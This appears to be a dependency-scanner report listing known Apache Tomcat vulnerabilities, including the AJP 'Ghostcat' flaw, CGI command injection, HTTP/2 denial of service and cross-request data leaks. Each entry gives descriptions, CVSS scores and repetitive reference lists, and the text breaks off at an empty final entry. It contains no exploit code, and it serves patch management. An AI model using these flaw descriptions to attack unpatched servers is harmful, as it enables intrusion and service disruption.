VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-1938 suppress
CISA Known Exploited Vulnerability: Product: Apache Tomcat Name: Apache Tomcat Improper Privilege Management Vulnerability Date Added: 2022-03-03 Description: Apache Tomcat treats Apache JServ Protocol (AJP) connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited. Required Action: Apply updates per vendor instructions. Due Date: 2022-03-17 Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-1938
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. NVD-CWE-Other
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - EXPLOIT,MAILING_LIST security@apache.org - ISSUE_TRACKING,MAILING_LIST security@apache.org - ISSUE_TRACKING,MAILING_LIST security@apache.org - ISSUE_TRACKING,MAILING_LIST security@apache.org - ISSUE_TRACKING,MAILING_LIST security@apache.org - ISSUE_TRACKING,MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST,PATCH security@apache.org - MAILING_LIST,PATCH security@apache.org - MAILING_LIST,PATCH security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - RELEASE_NOTES security@apache.org - RELEASE_NOTES security@apache.org - RELEASE_NOTES security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-25762 suppress
If a web application sends a WebSocket message concurrently with the WebSocket connection closing when running on Apache Tomcat 8.5.0 to 8.5.75 or Apache Tomcat 9.0.0.M1 to 9.0.20, it is possible that the application will continue to use the socket after it has been closed. The error handling triggered in this case could cause the a pooled object to be placed in the pool twice. This could result in subsequent connections using the same object concurrently which could result in data being returned to the wrong use and/or other errors. CWE-404 Improper Resource Shutdown or Release
CVSSv3:
Base Score: HIGH (8.6) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2019-0232 suppress
When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/). CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: HIGH (9.3) Vector: /AV:N/AC:M/Au:N/C:C/I:C/A:C References:
Vulnerable Software & Versions: (show all )
CVE-2020-8022 suppress
A Incorrect Default Permissions vulnerability in the packaging of tomcat on SUSE Enterprise Storage 5, SUSE Linux Enterprise Server 12-SP2-BCL, SUSE Linux Enterprise Server 12-SP2-LTSS, SUSE Linux Enterprise Server 12-SP3-BCL, SUSE Linux Enterprise Server 12-SP3-LTSS, SUSE Linux Enterprise Server 12-SP4, SUSE Linux Enterprise Server 12-SP5, SUSE Linux Enterprise Server 15-LTSS, SUSE Linux Enterprise Server for SAP 12-SP2, SUSE Linux Enterprise Server for SAP 12-SP3, SUSE Linux Enterprise Server for SAP 15, SUSE OpenStack Cloud 7, SUSE OpenStack Cloud 8, SUSE OpenStack Cloud Crowbar 8 allows local attackers to escalate from group tomcat to root. This issue affects: SUSE Enterprise Storage 5 tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP2-BCL tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP2-LTSS tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP3-BCL tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP3-LTSS tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP4 tomcat versions prior to 9.0.35-3.39.1. SUSE Linux Enterprise Server 12-SP5 tomcat versions prior to 9.0.35-3.39.1. SUSE Linux Enterprise Server 15-LTSS tomcat versions prior to 9.0.35-3.57.3. SUSE Linux Enterprise Server for SAP 12-SP2 tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server for SAP 12-SP3 tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server for SAP 15 tomcat versions prior to 9.0.35-3.57.3. SUSE OpenStack Cloud 7 tomcat versions prior to 8.0.53-29.32.1. SUSE OpenStack Cloud 8 tomcat versions prior to 8.0.53-29.32.1. SUSE OpenStack Cloud Crowbar 8 tomcat versions prior to 8.0.53-29.32.1. CWE-276 Incorrect Default Permissions
CVSSv3:
Base Score: HIGH (7.8) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.2) Vector: /AV:L/AC:L/Au:N/C:C/I:C/A:C References:
Vulnerable Software & Versions: (show all )
CVE-2018-1336 suppress
An improper handing of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.7, 8.5.0 to 8.5.30, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86. CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2018-8034 suppress
The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88. CWE-295 Improper Certificate Validation
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY,VDB_ENTRY security@apache.org - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2019-0199 suppress
The HTTP/2 implementation in Apache Tomcat 9.0.0.M1 to 9.0.14 and 8.5.0 to 8.5.37 accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API's blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2019-10072 suppress
The fix for CVE-2019-0199 was incomplete and did not address HTTP/2 connection window exhaustion on write in Apache Tomcat versions 9.0.0.M1 to 9.0.19 and 8.5.0 to 8.5.40 . By not sending WINDOW_UPDATE messages for the connection window (stream 0) clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS. CWE-667 Improper Locking
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2019-17563 suppress
When using FORM authentication with Apache Tomcat 9.0.0.M1 to 9.0.29, 8.5.0 to 8.5.49 and 7.0.0 to 7.0.98 there was a narrow window where an attacker could perform a session fixation attack. The window was considered too narrow for an exploit to be practical but, erring on the side of caution, this issue has been treated as a security vulnerability. CWE-384 Session Fixation
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.1) Vector: /AV:N/AC:H/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-11996 suppress
A specially crafted sequence of HTTP/2 requests sent to Apache Tomcat 10.0.0-M1 to 10.0.0-M5, 9.0.0.M1 to 9.0.35 and 8.5.0 to 8.5.55 could trigger high CPU usage for several seconds. If a sufficient number of such requests were made on concurrent HTTP/2 connections, the server could become unresponsive. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2020-13934 suppress
An h2c direct connection to Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M5 to 9.0.36 and 8.5.1 to 8.5.56 did not release the HTTP/1.1 processor after the upgrade to HTTP/2. If a sufficient number of such requests were made, an OutOfMemoryException could occur leading to a denial of service. CWE-401 Missing Release of Memory after Effective Lifetime, CWE-476 NULL Pointer Dereference
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-13935 suppress
The payload length in a WebSocket frame was not correctly validated in Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M1 to 9.0.36, 8.5.0 to 8.5.56 and 7.0.27 to 7.0.104. Invalid payload lengths could trigger an infinite loop. Multiple requests with invalid payload lengths could lead to a denial of service. CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - NOT_APPLICABLE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - NOT_APPLICABLE,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-17527 suppress
While investigating bug 64830 it was discovered that Apache Tomcat 10.0.0-M1 to 10.0.0-M9, 9.0.0-M1 to 9.0.39 and 8.5.0 to 8.5.59 could re-use an HTTP request header value from the previous stream received on an HTTP/2 connection for the request associated with the subsequent stream. While this would most likely lead to an error and the closure of the HTTP/2 connection, it is possible that information could leak between requests. CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-25122 suppress
When responding to new h2c connection requests, Apache Tomcat versions 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41 and 8.5.0 to 8.5.61 could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request. CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-41079 suppress
Apache Tomcat 8.5.0 to 8.5.63, 9.0.0-M1 to 9.0.43 and 10.0.0-M1 to 10.0.2 did not properly validate incoming TLS packets. When Tomcat was configured to use NIO+OpenSSL or NIO2+OpenSSL for TLS, a specially crafted packet could be used to trigger an infinite loop resulting in a denial of service. CWE-20 Improper Input Validation, CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2022-42252 suppress
